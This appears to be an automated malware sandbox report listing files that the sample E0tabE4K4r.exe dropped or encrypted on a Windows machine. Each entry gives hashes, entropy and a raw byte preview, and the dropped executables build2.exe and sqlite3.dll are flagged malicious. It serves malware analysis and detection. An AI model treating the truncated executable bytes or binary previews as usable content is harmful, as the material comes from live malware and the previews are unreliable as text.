                                                                                                                                                  Preview:....Bf...S.._.S....%......M^..M..2..Slq.,.=.Z.....&..yR../...,.P.l..........'...l.y..Q.._8.......rSw`.........+kPY...@.3.r....TN.m...^.y......v.....E....P...z.2.o....5...W.Pbvxpn..MUD..Y:Wb....KX..k.........%.....n8........Q.T.).#...z.....y....*T.....c/6E..........H.]....=..V."TKJ.IE..[.%p:.0.jA`....l.q.u#Eh...s..X.D....Y."..2..1e.5............n]..?.L.+.0.e.q.xo7.=...^J......[.:..N.....4.:0..\?....~.Io..96.T.gKGg..W...:...Qg..k*p.BIWz.zv....j.Pf......s=...?N...3...Q;dhF.|. [..i|.m.i.5\....JbI......B.~.....v...s..DP".~........Up..lLH..+E...?....S..#z..T..4..-....]cE...M..'%..&..Z@...l%j.o...vLi...sWf.......-D0<w...g....T)ZQ...BV.^..`..=KkO.(...2[.dT..+b.!mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\2057\StructuredQuerySchema.bin

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):424152
                                                                                                                                                  Entropy (8bit):6.332111073068895
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:2ZuLlbUWdApEomrGtbVadt9Dtm+vyJfbnQkK96B88yKv4bWTmTvEiLSg:2qDeadHtm+6dF4/T
                                                                                                                                                  MD5:0CFC25063852FD8E5443D300F47A0D9C
                                                                                                                                                  SHA1:9ED71D408AB9809D47601636A32AEB87D9ABB805
                                                                                                                                                  SHA-256:5065D60BFA64AD37F2294B2A56B7495ED295AF948F23B0CD92E2F67E71914E49
                                                                                                                                                  SHA-512:7442828D8804B02C99DCBE74902FDCD360747B7DB49DCD220E253B47B74350B1FED7742502087661C8082E841F83C8A37008393137DB8EDACFB16C084907D937
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:...P..C.A......pE.?..?.5R..m.....E7.?/<I.2.W....%[.%.%..P9xa5..p..[..2b..L..~:V+..l..............H/.....3d.......7w.Yju........Z<..!...Zw.x...DI9A.*..R..?../t.q.....V.o......1K.wW.....,.v.h..D?X.j......K..l.G...O.{<.r...(DT.~.{.Ub......1......,..*...^W[.....e.dp..:t...Q...9.[.ub.i#4.......V.S..{It.V.;.4.s=.0.a^.'=..losk...D@~..dW3WX.p.../.8.,z.&.jZ.......V.K.N.Q....i ..3#.r.W..T.....k.k....s...eK......Z.=4.=^8,.2N$....*'v7...e......c.`o.b.c.......t%.d..'...@r ...`.s;...]^..#..."..oj.F*..O.ZJ.1....0xrv.1.(.M.. <.R..b....8........^..4.3......G..............-&v.....!.<.G}.'I...u.w.Y..m....S.o..RV.4J.......A....P.n.X.7I.K4...n$' E........A...`.Y#....[..}.I..f..M...*v.v.....-.7A+..E^.F..... f.z....f......(V...7UA..`I.{...v.~(...;.k......eR.8 ..... ...r0......*.z...>..x...!zq.?%.e.....cU..|8.........b@.\.0-9."^..I`..Vm.......cz.....^pcA..!t.%.WG..b.!.....o......c...8.[....-.g.,. N..F2|....?.X.r.....[.....%..z..=n.........n.....i.....3C.`...@0../.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.988128282980794
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:HtUyTyQJswuWoPIK72vy6Xxt+iFRG+X7iAzX2iUfNJdFOyb:NUle1oQTvyOx9ZXrUfNJdsyb
                                                                                                                                                  MD5:08B243C1B65C6EB20AB8C5BEDDF6AD5D
                                                                                                                                                  SHA1:DEDA437E511741D0AF17B1E22465C66825DBCA96
                                                                                                                                                  SHA-256:967EDD5C5977E08B7EAEF23646B1B1394CCA30C07421F017172B8C168A02E0D9
                                                                                                                                                  SHA-512:6C3388A4DA6CEE3DCA00F6EB0D3F5932D7E0585BA4E6BF7F43109C20C0DEA2E64CA0AADAA6A9E9EC1BFC0888D4D867B89716221167DE5EF1E588049FD4BF5737
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.... .\..?.f.q..y.....~.q....>.3.B.....b.....n.RR...E..7....T@..l...d..an..@..q........*.....x..+..Y..bp.....)Y8.f..Va.F.,...XP:C..........)...N..z.......j.w....Oa.........w.u.b.t.....y...Y.....i3.<..0..`......f...f.3..G..G...X....$F..X..b..mp).Mz.$.?/\.74.r....5vX.R.p.0....{.d.. qT'..<..s.f`..(.w....T.}a.'...Mzj..yJ.....1....V..../%..'..VE.....Mp'..w../..zJ.Iq..$r-.V.x2.[`-...cP%.X...vV.r8=g^2..I.A:...Ks.......{..g<....#.Af.%..3......~.B.@..%..Bo.....q.$[........E}.....Yo.aK.nu.$K.i.=O4P..U..q...Q..^.....!.Ug;....v.B....7K.b.I.g.>....Q.....!....\.`..h8:..0....M.."..{l..,.......5...AF.....").v...Br.T........u@..........7.%....../.z.Q..9.......|./3.......t7....J(.TS......ms).....1.M>....V.:....u.q.D....I.>...lr.@.....A......../.)..4(...T.HvG...tl.;-..,.`2.cd..<.tE...z.........n.2'.2...u..x.5Y=c....I..k..gd.@.8..s._.d..J....{.....=j.........VwOW.9....nG.h..1.......8..^....[6k.7H..j..=.so...Y..s..hs...m.}$.......G*!..!.h....^8..?.L.}..9'.j

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.988385252481199
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:IxDKGbbc0QH2+xoOZj5lJ/WiSZpDl7TG/jxkTX3Raw:IIG0W+xoGNz/4lTAjKn
                                                                                                                                                  MD5:757358C9C7D708642676FD711452E968
                                                                                                                                                  SHA1:B14B944ABE34BFA5F33B7C94C12BF6DD2D264C3F
                                                                                                                                                  SHA-256:BE449CA74DEC6B0DDF53187473A57412F82726946658DE5F68963F0978B3A64B
                                                                                                                                                  SHA-512:66C2F795ED0284248E56E1AE6C95BFB201AD9838610492D73F30873F7ED0198D5D0E84E804E80B2021464BC4DFE7F7682571F1A31BD0A42ECA005C5BCDE0FE72
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:....`>0........<.8W.|..6..3tI....:.).k.yG%K2.qpa...cS....E..q{s..Hs...K..p....}...$......~.&8+.........-r0......g.....N.S^+~}5'0.:..,.f.o....d...J..Y.o..Dd.46h.n_<.l..aS..d..XE}2.1..:.r...h.T...-0..*1+C....H..S.x...<..D... K....I..Yj...>...9.......h..K5....r.E.S.'[.Xt.....&F..L..(_?......A^-D=b.T}..|.'...6.../..b.]N./{.n....&..C.@.o......"..n/.0..Z. _........yRw...6.R.8.b.K..F....? .c.~.o<S...<v.'m.v..C....-.F?.#...G..52&..*..%F.[.Q-.U..._v..8.\.............K..K.`..Rc.W.;..+....k....B+.6.....(Z!....I/F..[G......\..}(7Z..g..O.5V...mAb.*r].j.B....8b-.E.#d...8.....-}R.&.Mw.'.6.L.{p.b..a.j..P%..F....KL.3..'4E...8..0.6.p...y...6...k@.w..g..-'.C.n.+c...ikE....-D...,....g...3.iM....1.|.g....\...[j.....0`.1.X0h..QZ...jG._.JZ...$C.#...evRk.n....qAX..I.Dg+d.S..Iw[uBp.i.{1Dw9...h....x.V]..S M....1k.n..j2..7..o..d....e...m...3.......ih......d..v..}..1.\.....?.t8.s..E..G....N.V......m.....6..p..4..|f]...*.C/....AN.*KI..+.{...4_M...vT.g1....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{20001B34-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):424190
                                                                                                                                                  Entropy (8bit):6.331715924624306
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:7JtYHcJ1pfPQiualoVkuhm+vyJfbnQkK96B88yKv4bWTmTvEiLS4:74ORGalUkOm+6dF4/r
                                                                                                                                                  MD5:130B15905F023B64DB25B546758D155B
                                                                                                                                                  SHA1:82553980BD938050BF7C2460F3128319FFF5777D
                                                                                                                                                  SHA-256:4DFA779B37DC3A9E3469841257446838D5312B1AA609995612099F0B557BAD0D
                                                                                                                                                  SHA-512:C18F65276344B5AFF7B70F6991D89802DB3CEED6870674C9EE93B3B87BE5EC1BA1EFE943562B59CAE704D89A5EFB1BB744F48BDEE2F0D7F70921D16A88BB4F4C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.w.. ..-..4H.6.C.%ai.l.G.S.P!G.I=&.#.L.Ao.h.........K.p...... .ADg...p.]h...........5v......Pe.U...^...,..|.*.l...D.EV...xG...~..=n4..a._.'.}..wKb.....^| G..........Vf..i;..d..]6......-.C...Z.\...v|q..Z.....g.j|.....UA`.s.)...|<.r.o...J..QZ.<.*".71K..{....L.!6O.-..o{.*.y..4.}\...gS>.B...=....j3..x......i..?O.:.....^.D..q.|.Dwp.O{.<N..D.Yu....L.98.}..".{^.@...:1.8...N.m....Tx......0......a^}?K.?1......)<.k.1.n.m.!........n)R.F..P.................:b.H. .....-.h....z_...:.../........G.Y.......R.<_.....s.....d...R.w~.&b.Z`.4a...|IwK..a...(...g...W....#...Vy..mN..o.f.3Y<Jx^*..].g.2%.7`Y........"...[\..:.!W#.7.a...N..pWxk.C..:.r...b.)...:K..<.q3El..3.Fx.U.9..g.3.6..R...2..3.VW.C...s... ...c.....5...7.y........Uo..=B^x.......1v....=.P8.No*L!..<0...'..'.u|H.q..q..|$..xu...M....D.:95.@.&.2...^X...}P:.........\'.Y..........{t..j.".&.N...K.U.....n..Hkkd.=....}.>vV,b3.*..c...D.....k...S....s..d.h..S.Q.a0}...`....|/..FQ..w.....c....Z...N%.V.4t...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\sqlite3[1].dll

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1106998
                                                                                                                                                  Entropy (8bit):6.500333177860392
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:dxylSMUMifofI9ayCvcZMBiMjCodEMdo8R66tCWko5+jsbFcoYuprzpGSgGSrz:d4AMB3caSZMijBI1CWkoj5auF5gGSrz
                                                                                                                                                  MD5:1F44D4D3087C2B202CF9C90EE9D04B0F
                                                                                                                                                  SHA1:106A3EBC9E39AB6DDB3FF987EFB6527C956F192D
                                                                                                                                                  SHA-256:4841020C8BD06B08FDE6E44CBE2E2AB33439E1C8368E936EC5B00DC0584F7260
                                                                                                                                                  SHA-512:B614C72A3C1CE681EBFFA628E29AA50275CC80CA9267380960C5198EA4D0A3F2DF6CFB7275491D220BAD72F14FC94E6656501E9A061D102FB11E00CFDA2BEB45
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                  • Filename: RKyTx010jW.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: vV99wd5vMp.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: sbvN2ih5AU.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: kOVwcHSfrR.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: PbQI1np5cI.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: CinaQ61J8d.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: H88B1esQF0.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: n8JqyJSXnE.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: buildz.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: OIpWHA8mdz.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: XrNOw4sxMG.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: n1ppfW1lhW.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: 7yCti1JQXn.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: EdRzQIfoXb.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: buildz.exe, Detection: malicious, Browse
                                                                                                                                                  • Filename: build2.exe, Detection: malicious, Browse
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c...........!.....&...................@.....a.........................0.......:........ ..........................*...........0.......................@...<........................... .......................................................text....%.......&..................`.P`.data...|'...@...(...,..............@.`..rdata..pD...p...F...T..............@.`@.bss....(.............................`..edata...*.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc........0......................@.0..reloc...<...@...>..................@.0B/4......8...........................@.@B/19.....R............"..............@..B/31.....]'...`...(..................@..B/45......-..........................@..B/57.....\............B..............@.0B/70.....#............N..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\build2[1].exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):367104
                                                                                                                                                  Entropy (8bit):6.976668751990096
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:pfLgtyckjU51Vc7lLUvTlR2agQAYNMQSnjbeg:pfMtycGU5/klLUvTlR5Aiuv
                                                                                                                                                  MD5:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                  SHA1:3FB4182921FDC3ACD7873EBE113AC5522585312A
                                                                                                                                                  SHA-256:26063C78E5418610471A9F3A00A155D7D1E5B29856E1979BA3BDC42681A871D0
                                                                                                                                                  SHA-512:C7569CEA7F1A841E7CAC9CD41287DBA3BCACF2CF9DEE7BECE88800848A7AD5DC4CD2BDC896C7389F0F1144079BBE168048B3F722BCD76FA5D6E14F3081BB6427
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$...$...$...:...5...:...v...:........A..'...$...x...:...%...:...%...:...%...Rich$...........................PE..L......d............................."....... ....@.................................W}......................................\U..(............................................................H......XH..@............ ..t............................text...y........................... ..`.rdata...=... ...>..................@..@.data...|....`.......P..............@....tls................................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\activity-stream.discovery_stream.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1583
                                                                                                                                                  Entropy (8bit):7.877848616630335
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:YdTGfhsyuLJxAfwBvueq7N/Qc/E+dFgCD:4TGvzw1ueq7K4E+V
                                                                                                                                                  MD5:5F5D48F8ED4E578CC398929E2020E0A1
                                                                                                                                                  SHA1:9DBCF97E1D8954769C74B47157C8036D7E0D07EB
                                                                                                                                                  SHA-256:ABFE2A387068EE37D34337CA081B53BAA52E045EC9849E6427D8F424CB9A93A3
                                                                                                                                                  SHA-512:F6A3D44FD2C0B28A85593A2BE68C277B593038560D452EEA27A34216CA5A12310A4B1C8F76B25430878502D16F1C7AC02DDAA4005C473D19AF89FC61D740900B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{"spo..bg{.7t;.dw...}}..E....Y.p.v%...Bo.u....."7..m...W._.*..%;.qx..... ...ND%}cLt..=..;Q..j.:.M..UE..z..zR.S.. ....Nl.Z%tw^.........].....GA......+dO......V..f......../."....l.(l..........n...Q...\.`...u.0.jO..f.j.&....]x.G..9F........o..g..,.&$....k...fd.o.F..oz.H.f.XL.1...c..-^v..C...t..t..@.......X.&V!.d.z..p.G.....uk..../.......E...(......,G......f2EIvn*.9&C%...1C..].g.2..kZa..{KW.>49.|. U.y........OY.........z...*.9..B.>.)@..D.Ro'ws..`.kD.(N.5.X...I[.if<.;{j.>...E..-...h....o..ut..2.h.c..r~.H.j.&.@W_.zW.8m...l#.`..I$..W.|J.tbo.Jr[4.q...E#.y..w.l............i$C;iZ..AG....dK.>zR...:\Y..u.Pg.z+&lj..Dd8]O..Q...t.3eLz..J.....).=.d`...>w!(U..C]k......+....^...5..J68..$\..|..y.Zl]..}....Y!....,..........)..BX.q..su.....9:..e.....d..w..3@.85......Mj...2..h....{...4.J.,........:...U:YX.\MX.3%z<.*ik.6....N?.Ix...*...F..wZ%....q:Mo.......z.....9....^...6PNx/(.....2..6..O.z.R..V.s.s*\....X.....Z>.Y4.......l........y...'.......@..X...A...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\MSIMGSIZ.DAT

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49454
                                                                                                                                                  Entropy (8bit):7.996220460037821
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:gqXzMv1KTH4bRZK8exgLxX8aSSncKHKeG6e:njpEbRZ5LxXEsF5e
                                                                                                                                                  MD5:8EDA717B459EFCA60AA507A90686C85E
                                                                                                                                                  SHA1:E91AF60EBA828537ECC2CB769F1A9C4D2887E6DD
                                                                                                                                                  SHA-256:4C0E1C26639E678731F90B4BFE9C20450F5448F4B99AFED2438525B0E28FFE9A
                                                                                                                                                  SHA-512:9DBE9D5B03090B7AC012F89F615232CB9D979CFC078D834D3A4BF30B3EE86C308A8A371FEFBD88DD7925F71FD5E480BF131BD53B6A8268ACD358C4495615243C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.......QL..N..a.M...h.m}.R.(U..dm..<3.s.\.4..y/AT.f.m...yvY.M....R....6.5.d....[...c.......H._j.q..f...((...'..1>..x...5%.^vE'.+#. .....D....2O<..KU!..!.i~u)2..P.>5B).u..$.n3.....o .....t........{,.V...b`....z........I.o&...;.2....}d.}....?bYb\ ........5x+yx1R.X.........u..X..NO..$..E..a.X..2).....R.oL.W...{...&.=.......9[.....^).0o0...U..)J..S>v.vW.2.u...q..uO[....u..=.^_.aR.j.P.....W.(..(.ZH.@..2^.d.%yS.mgY...JsNJ.ZM.8..w....E..+H..9.d.BR09!}#HP}*....'v?...^......H.8k......._...=....&.lv.d.V."u./...+._sFy....9\B.....M.nya?.......i..."vYV..<N.F.#...K.=:`M_.J.3z.[FM.Pv.R...#...;e|;..F.v.&..5.:.+J.........Ao.......i..~.D.h.)D.....:xT\.5....r(.(..@.)...U7.....h......M...C..C.q.QYy.O).`.a...?C&..F<........:..6........{g...^..&Y1.E..).0E..$.o[.l%2^..w&.......{`.{F.N.P.w`.w)*5..`.a.....Wl.*...2...r....A....._.8."..N.Bp..|..q.S>.0..e...h..).w@..*^....v.F.W>:}x.w.3.p(.c.].l.Wu...v......F>cvm..D5^..m]....l..#e;I...{....%.]no:...H._0`../..K..#.^

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\Microsoft\Internet Explorer\DOMStore\OBIC9H4P\www.office[1].xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):347
                                                                                                                                                  Entropy (8bit):7.242246997063088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:rkOE3+RVTd8ldobYmLRZJv3k+NabN9EYSwWc9LhYHLPB0wZW3qlnIS1WdNcii96Z:IOewVTd8ldCnZJcgg9N5WCLhYHLPBnwH
                                                                                                                                                  MD5:E4D1C7899A317F961736A4F917E4275C
                                                                                                                                                  SHA1:E1F9F54E907BABB3869F3BF6934AA9729F213882
                                                                                                                                                  SHA-256:F6E77ED08C58B5C13CBF90C90448383487F428F4384564B024427E33C7490378
                                                                                                                                                  SHA-512:9319D336B412E1CEB8F3842FCC271BC7DFFB890199BB2A675AC612F4B2E0D97CE14A8C72C2C9CA2807D6AF0D296D46BD8114B54273C58A043D12E62F3ECE5432
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<root\.2\..D.qF. ..D.S..w...=.C..k.1.*.....r.%.e.DB=......[.b... ~i..m...{....h..C...+3.....".;..Ov.h...M.."....q#...2o..#.l......3..)..<}.0....V.N...uzbH1(=\.Y.Y....R..h.....l..Q.0.k,...D.}..C.b.....y...X..n.....1..o.^.Z.C...0b..R.>.o.Q...h.G.6.{...@......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.edb

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1573198
                                                                                                                                                  Entropy (8bit):1.3858772374253157
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6144:mmutfMje1spLis7FEdWeTr1N57AmHcFCTy:mmupMcSLXFaLrKm8J
                                                                                                                                                  MD5:FF09F94026DB903054AC295F06CEAB48
                                                                                                                                                  SHA1:7FFDEC76125103B5A1C96E059A68B124037DC447
                                                                                                                                                  SHA-256:49B1EEA592E138DDE9BBF68947C84EF76B1F386BE5BBC1CD1EA9B84D8390C248
                                                                                                                                                  SHA-512:5903D240A43B36CCA0B5D1BAE2AFCC0778CB63893F3CEFCC1DF68BF006ED3538DA95B217DAC803A92ED2FDE0FB12A33AF64DDC506DF489478747C316BABA5E66
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.......9k.>...Wk^.W.gUD...?...TV.....#.p".0.q..x_.{..Vo.....(<;...g.%...]zt}.D....Y...3x....q...Q.{fx...1?X.j..*.<.N...k.RTC..$2...VY..".(.e...i..t....'.].n..@...\...z....q.....ng~.#.9.M.L...#...... .K...+i.L.%..d.....0.8...Q.EZ_..9..kEV.H{e.P..o.._D.-[.2.U........f6Pf8...y..6.e.:.C.%......l..A..k7P.Jg....;..QZ.....).~..3....&..;.;r...W...`....?........:..\@%Z..e=ii..i.'....i...g.K..K...7.......w'..)Pau".$..8m.;#..?.@`.#...`.......*....e......1...:.E.W...jz..&Y?w....A.....S......A....y..).T=...l.6.[L.AQ.I....HK.!...Mjy.....AXjx{.Q.U......$....?.'@j.!..+....z...x.......e.,.H...ZTh...4...."...Dp...`.6,..G./.>z.{.......:.@...s..J.=....,.k.3...^.6.h..b.]..n....G...*.g..-.#:..:.......C..OS.kN..A.M..jm(R...R..z.+I. .....VVw.......UQ.w....L..v5$,..r..F..)....br,.).....+...-x.. .9T.WczBlk.Ln.5...R.w.<..{....L.D!W..]a.[..Q|.....Dd...=....*.Ne3.b<...t.a.UY..R,..n-J.b...7hPye]...._...Z...ac..1..D.!.&^....7!@`..Er.DV....wh..Y..!...E...b....j?.K}=...'..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AppData\CacheStorage\CacheStorage.jfm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16718
                                                                                                                                                  Entropy (8bit):7.989153302068133
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:flY79+eh1hDvHsm3W1vdzqqy+mF2bkaH33owV3tipOjbvePIq+3TFip:dW9+ehrHz3gGqypZaH33T90Onve3+xG
                                                                                                                                                  MD5:0EE7617C286EEA39D396CBB5B3436B3A
                                                                                                                                                  SHA1:962FA7B5E94D78D74D8634992F1DA8CEC4B2B966
                                                                                                                                                  SHA-256:B2B45F5E538BDA6FEB4D0B577C22056EE5958D7AFA9515597A870FEE957B2725
                                                                                                                                                  SHA-512:8E29001324983661F87481E244F79FE339209D5A4FB85A5DA36A42F4EEC9F9A311D7FFB0BF77240CDE7450C9085FA6F9519D08A9C95BA7298B98DEA0180A2338
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.M.3.(Z....5..'... ......l.5...,+...w.H..~.o.>.-2..#!.z..s.{.L._.0.1..e6.^.......c.O...J..L..#6Y.. 6...<..o.T... .3.).s...#.*..x.[b.|H..TZ.`..u..M.f...4....\p....S.|@}.".@.%....,...Z.6n....)E.Kj.......y6.t.:>...\3hR..N..e.....U...9F.b...\.]N.SS..U.r.f.s.T.QB...j.;re....^..Zn?.g....V....C;.4..Yul..^!.V"....$.1.....4~{...GKw^.O.)C.V?F......D3...8.].....Hh8...-......w.Z..o.)....2....1S.\...... .x.A.......'.XP.f...p.L.....[w...Af.....or..4.....7&N.)C.>..'....kqfQ."..].......[E.6...J ..u|uTM Q.....h..V..a.`..{......D.t....b....df..$U.R6d....sV....V..j.t.)..Y5...T....t.P.NwgK3h..".6....,<r.m.D..%5..@Z'.......$[.$Q.4YC.!J.c........b.~..3.{..l.....R.|..R...,.....~............/.]....X.Oi.....).8....q..ed_...e...`...a.....V...X.....Jh...W..bG.*......&.K'.l..D....7..u.....st.......iz..j..0..~..$.&.c./*.p..C.[.r1.|"b..w..t.......'..2..r.u....+....U.P..iQ...he......^J*...a.R...r}F.....G.a.R..P.CZ...NP$..>..:NY_.OY.t...X....+..4...)...X3U...E.Ar

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.97612784530932
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:RproPbb8DKJhdWI969ikD/+pvoAKqoUaazXK7X33GJCEJxupVW:70bOKJx969+gtqVz8XyCMxup0
                                                                                                                                                  MD5:841C27937F1D169B1B3D347DE5F795AA
                                                                                                                                                  SHA1:E91581CE0B552187CE180A86213C9675EA1AF1A7
                                                                                                                                                  SHA-256:BDFCA81899261E1C4E74DC5E2A809184E0C17CC8659D599F8EED4EEF075B143D
                                                                                                                                                  SHA-512:6B4FBCB87CED10320B6C7CB31CC814F930A4F33091992EEF08BA589EB9AACBC073FC276E6DB7869EB12BE1F824D99BD8DD27181CFE19EB0DD6B88FC0E3133445
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:regf.......9.O.s....K...g..a.($../..m^Z...H.[..w[B..}...{/'...n...r......L....R.nF.@%.......d(..PQa....F.Hp.r6....)...5.R.}............u.\.Q6..\..:.z)..G.l2._q....NRp..@...7...........J.M.]L.Y.....A...9*m........<..9....)p.{.9..........!.|.uM......R.?.{B;.(3.}.0.^..n...7..%.t.W^...]..P.&.....B.v.m..+X..C....Q....^6.b....sd.T0.7.,O...!...o...M.yQ........; ...}x[*x.g.:N.YK.....Z...h........+...u.qB.zX...~w.w...^.9l"t...ee..).{.(.~....Zj.sD..E.....r.v....U..D~.!..;t.G_\.E....w..4....6!.J....5w3...Gv..:.....9d_.....y........yX5z.z..`zO#..f.rM....a...a.I..7.......k.. M...A.i.aa......._'^..\..v...ly.f'.wi....-S)$.LD[......./....R..2..M.>_..kn.o..).N..........%l8...ZD..Y .......K.t.<.I......(Q.Iy..v..c.fe.Y.e.Xn).K3.S...".N.@@.g4..c.cl...4......j..:.....EP.9..x.R....vy.4F....&..h............?.i..e.>....G.]....D..&.H..7.(?.C......@.X.j.*..)Kx.~.',H..=.....5`{.,......a..i..<-...NG.....3.'.Bs/2z..o...?."m.-...g`.....(.@%.E...`.KY.|'v.\.Xe......

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat.LOG1

                                                                                                                                                  Download File
